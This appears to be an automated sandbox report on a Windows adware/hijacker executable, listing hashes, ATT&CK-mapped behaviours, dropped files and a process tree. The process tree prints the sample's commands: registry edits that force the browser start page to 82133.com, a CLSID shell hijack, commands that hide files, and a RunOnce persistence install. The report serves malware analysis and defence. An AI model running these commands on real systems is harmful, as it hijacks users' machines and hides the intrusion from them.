05ad70d2a4db722f8cc72e634b2064262204bbbe3fa288f9c6971a422cc58400

Analysis

max time kernel
150s
max time network
149s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16-03-2024 00:58

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ccb2ffa0e93b05ecb17ac1853e4a51d0.exe
Size

54KB
MD5

ccb2ffa0e93b05ecb17ac1853e4a51d0
SHA1

df1dce11eebc8452ed7b0276595c303228e9ac62
SHA256

05ad70d2a4db722f8cc72e634b2064262204bbbe3fa288f9c6971a422cc58400
SHA512

6c4cfc9348fda76c6cadfd742b64e18a82d4f7a12a0602bf665ea5fb91a44f5bff5f3cd0ef7e8f943ece0ea89f6aba5be811535764b3ca8cd8301bc8da0631bb
SSDEEP

768:sVKm4GV4ujtuYgFC5IjezJckOyLb172+oEFZ0TORX3iSHWIwjkdLv/kcH5hUDrpd:sQKV1MyVckOG12TGX1HxwjkVnDhI+He

Score

8^/10

evasion persistence

Malware Config

Signatures

Sets file to hidden 1 TTPs 2 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
1788	attrib.exe
564	attrib.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\hsdfasd = "\"C:\\Users\\Admin\\AppData\\Roaming\\redload\\tmp.\\a.{971C5380-92A0-5A69-B3EE-C3002B33309E}\" hh.exe"	rundll32.exe

Enumerates connected drives 3 TTPs 1 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\D:	cmd.exe

Drops file in Program Files directory 2 IoCs

description	ioc	Process
File created	C:\PROGRA~1\INTERN~1\ieframe.dll	cmd.exe
File opened for modification	C:\PROGRA~1\INTERN~1\ieframe.dll	cmd.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\INF\setupapi.app.log	rundll32.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Main	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main	reg.exe

Modifies Internet Explorer start page 1 TTPs 2 IoCs

stealer

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\MAIN\Start Page = "http://www.82133.com/?S"	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2297530677-1229052932-2803917579-1000\Software\Microsoft\Internet Explorer\Main\Start Page = "http://www.82133.com/?S"	reg.exe

Modifies registry class 9 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{971C5380-92A0-5A69-B3EE-C3002B33309E}\Shell	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{971C5380-92A0-5A69-B3EE-C3002B33309E}\Shell\open(&H)\Command\ = "wscript -e:vbs \"C:\\Users\\Admin\\AppData\\Roaming\\redload\\3.bat\""	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{971C5380-92A0-5A69-B3EE-C3002B33309E}\IsShortCut	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{971C5380-92A0-5A69-B3EE-C3002B33309E}\Shell\open(&H)\Command	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{971C5380-92A0-5A69-B3EE-C3002B33309E}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{971C5380-92A0-5A69-B3EE-C3002B33309E}	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{971C5380-92A0-5A69-B3EE-C3002B33309E}\Shell\open(&H)	reg.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

description	pid	Process
Token: SeRestorePrivilege	2368	rundll32.exe
Token: SeRestorePrivilege	2368	rundll32.exe
Token: SeRestorePrivilege	2368	rundll32.exe
Token: SeRestorePrivilege	2368	rundll32.exe
Token: SeRestorePrivilege	2368	rundll32.exe
Token: SeRestorePrivilege	2368	rundll32.exe
Token: SeRestorePrivilege	2368	rundll32.exe

Suspicious use of WriteProcessMemory 50 IoCs

description	pid	Process	procid_target
PID 2192 wrote to memory of 1744	2192	ccb2ffa0e93b05ecb17ac1853e4a51d0.exe	32
PID 2192 wrote to memory of 1744	2192	ccb2ffa0e93b05ecb17ac1853e4a51d0.exe	32
PID 2192 wrote to memory of 1744	2192	ccb2ffa0e93b05ecb17ac1853e4a51d0.exe	32
PID 2192 wrote to memory of 1744	2192	ccb2ffa0e93b05ecb17ac1853e4a51d0.exe	32
PID 1744 wrote to memory of 612	1744	cmd.exe	34
PID 1744 wrote to memory of 612	1744	cmd.exe	34
PID 1744 wrote to memory of 612	1744	cmd.exe	34
PID 1744 wrote to memory of 612	1744	cmd.exe	34
PID 612 wrote to memory of 1040	612	cmd.exe	36
PID 612 wrote to memory of 1040	612	cmd.exe	36
PID 612 wrote to memory of 1040	612	cmd.exe	36
PID 612 wrote to memory of 1040	612	cmd.exe	36
PID 612 wrote to memory of 1124	612	cmd.exe	37
PID 612 wrote to memory of 1124	612	cmd.exe	37
PID 612 wrote to memory of 1124	612	cmd.exe	37
PID 612 wrote to memory of 1124	612	cmd.exe	37
PID 612 wrote to memory of 604	612	cmd.exe	38
PID 612 wrote to memory of 604	612	cmd.exe	38
PID 612 wrote to memory of 604	612	cmd.exe	38
PID 612 wrote to memory of 604	612	cmd.exe	38
PID 612 wrote to memory of 940	612	cmd.exe	39
PID 612 wrote to memory of 940	612	cmd.exe	39
PID 612 wrote to memory of 940	612	cmd.exe	39
PID 612 wrote to memory of 940	612	cmd.exe	39
PID 612 wrote to memory of 2276	612	cmd.exe	40
PID 612 wrote to memory of 2276	612	cmd.exe	40
PID 612 wrote to memory of 2276	612	cmd.exe	40
PID 612 wrote to memory of 2276	612	cmd.exe	40
PID 612 wrote to memory of 564	612	cmd.exe	41
PID 612 wrote to memory of 564	612	cmd.exe	41
PID 612 wrote to memory of 564	612	cmd.exe	41
PID 612 wrote to memory of 564	612	cmd.exe	41
PID 612 wrote to memory of 1788	612	cmd.exe	42
PID 612 wrote to memory of 1788	612	cmd.exe	42
PID 612 wrote to memory of 1788	612	cmd.exe	42
PID 612 wrote to memory of 1788	612	cmd.exe	42
PID 612 wrote to memory of 2368	612	cmd.exe	43
PID 612 wrote to memory of 2368	612	cmd.exe	43
PID 612 wrote to memory of 2368	612	cmd.exe	43
PID 612 wrote to memory of 2368	612	cmd.exe	43
PID 612 wrote to memory of 2368	612	cmd.exe	43
PID 612 wrote to memory of 2368	612	cmd.exe	43
PID 612 wrote to memory of 2368	612	cmd.exe	43
PID 612 wrote to memory of 1160	612	cmd.exe	44
PID 612 wrote to memory of 1160	612	cmd.exe	44
PID 612 wrote to memory of 1160	612	cmd.exe	44
PID 612 wrote to memory of 1160	612	cmd.exe	44
PID 612 wrote to memory of 1160	612	cmd.exe	44
PID 612 wrote to memory of 1160	612	cmd.exe	44
PID 612 wrote to memory of 1160	612	cmd.exe	44

Views/modifies file attributes 1 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
564	attrib.exe
1788	attrib.exe

C:\Users\Admin\AppData\Local\Temp\ccb2ffa0e93b05ecb17ac1853e4a51d0.exe
"C:\Users\Admin\AppData\Local\Temp\ccb2ffa0e93b05ecb17ac1853e4a51d0.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2192
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\start_max_bat.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1744
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Roaming\redload\1.bat
    3⤵
    - Enumerates connected drives
    - Drops file in Program Files directory
    - Suspicious use of WriteProcessMemory
    PID:612
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKLM\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d ""http://www.82133.com/?S"" /f
      4⤵
      Modifies Internet Explorer settings
      Modifies Internet Explorer start page
      PID:1040
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /d ""http://www.82133.com/?S"" /f
      4⤵
      Modifies Internet Explorer settings
      Modifies Internet Explorer start page
      PID:1124
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCU\Software\tmp" /v "key" /d ""http://www.82133.com/?S"" /f
      4⤵
      PID:604
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCR\CLSID\{971C5380-92A0-5A69-B3EE-C3002B33309E}" /v "IsShortCut" /d "" /f
      4⤵
      Modifies registry class
      PID:940
  - - C:\Windows\SysWOW64\reg.exe
      reg add "HKCR\CLSID\{971C5380-92A0-5A69-B3EE-C3002B33309E}\Shell\open(&H)\Command" /v "" /d "wscript -e:vbs ""C:\Users\Admin\AppData\Roaming\redload\3.bat""" /f
      4⤵
      Modifies registry class
      PID:2276
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h C:\Users\Admin\AppData\Roaming\redload\tmp\a.{971C5380-92A0-5A69-B3EE-C3002B33309E}
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:564
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +s +h C:\Users\Admin\AppData\Roaming\redload\tmp
      4⤵
      Sets file to hidden
      Views/modifies file attributes
      PID:1788
  - - C:\Windows\SysWOW64\rundll32.exe
      rundll32 syssetup,SetupInfObjectInstallAction DefaultInstall 128 C:\Users\Admin\AppData\Roaming\redload\2.inf
      4⤵
      Adds Run key to start application
      Drops file in Windows directory
      Suspicious use of AdjustPrivilegeToken
      PID:2368
    - - C:\Windows\SysWOW64\runonce.exe
        
        "C:\Windows\system32\runonce.exe" -r
        5⤵
        
        PID:3016
      - C:\Windows\SysWOW64\grpconv.exe
        
        "C:\Windows\System32\grpconv.exe" -o
        6⤵
        
        PID:1448
  - - C:\Windows\SysWOW64\rundll32.exe
      rundll32 D:\VolumeDH\inj.dat,MainLoad
      4⤵
      PID:1160

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\cdf1912.tmp

Filesize
791B

MD5
1706b41fd446b5718a8419c0fcb35d55

SHA1
d9bb8df22acdc60c754ac14982cf795df3b1b815

SHA256
5c6d11ac3f220f8286455764ab2581dcb6554692d3b9974b097364d77edb3943

SHA512
68c9f6170ecdfcc79fc63cb646901d2ac52a915620b159047b2c93761c261897eb5ecc15065635105637a61a840d393104c15ea8268897fb8bb2fbc1a56c626e

Download Submit
C:\Users\Admin\AppData\Local\Temp\start_max_bat.bat

Filesize
54B

MD5
504490369970f1c0eb580afbcdf91618

SHA1
b52f65cd538e6c998b2c7e3167f9c8e8fa6c7971

SHA256
a13a0579286521f0d7cb55fc7d28c6d33f14c0573e9e69f7584fa4008a8e7d43

SHA512
5495ce79abf0fc4ffbfaf9aefa484145f4e0d3e8457be0e2e4dfb1284fb5413016f2d9867e2386db5c4f7b51863bfffeae8ea6bd879053fdf6a928ab2a0857ad

Download Submit
C:\Users\Admin\AppData\Roaming\redload\1.bat

Filesize
3KB

MD5
493c22f6b15f9766ae7c23794fc77da0

SHA1
43723ba660dbc1486f717441b58298d33b9f2048

SHA256
478b8c2f0dc23db49d62f987ca5e01afde54d7abff647894ad2e38f9d7fde182

SHA512
662644aeef7666b23b90b6ce08ea8271a7cb7379bad6920434d045fdcbbcd48b4bbb65620ac4a5c347e376ecf2ff60e115b869c74a28ca7776cf6fc83b01df34

Download Submit
C:\Users\Admin\AppData\Roaming\redload\2.inf

Filesize
248B

MD5
2197ffb407fb3b2250045c084f73b70a

SHA1
3d0efbacba73ac5e8d77f0d25d63fc424511bcf6

SHA256
a1a42f5a41ce65135b1ad525eabc04cce89ee07d2f51d06e5e1dea6047081591

SHA512
b35a99e144da3f02de71158f58a6b937435d1bce941126a554783c667654b880527b11ba8a5c0fcf093ce28863ea4f5e60f73f8f973a727f177d584d2e9c80fe

Download Submit
C:\Users\Admin\AppData\Roaming\redload\4.bat

Filesize
4.8MB

MD5
eaf4abf7e8b4d3933457da129001e4e6

SHA1
3672551c8c0df2d3e5cc476e820675756b953c28

SHA256
b93d07f34687cf1b08fe42f09b7b93b2e90c7a78ad8cccbae5d0dbd861088e28

SHA512
1d74b1e9b28b3ff7e4cf275df7d780f852c23646f34935ac661b7f12b673393917c447acc987964adc9845298421af31f41718536adb7cbdfdac4e3c104fa2b5

Download Submit
memory/2192-0-0x0000000000900000-0x0000000000925000-memory.dmp

Filesize
148KB

Download
memory/2192-1-0x0000000000020000-0x0000000000023000-memory.dmp

Filesize
12KB

Download
memory/2192-5-0x0000000000900000-0x0000000000925000-memory.dmp

Filesize
148KB

Download
memory/2192-32-0x0000000000290000-0x000000000029E000-memory.dmp

Filesize
56KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads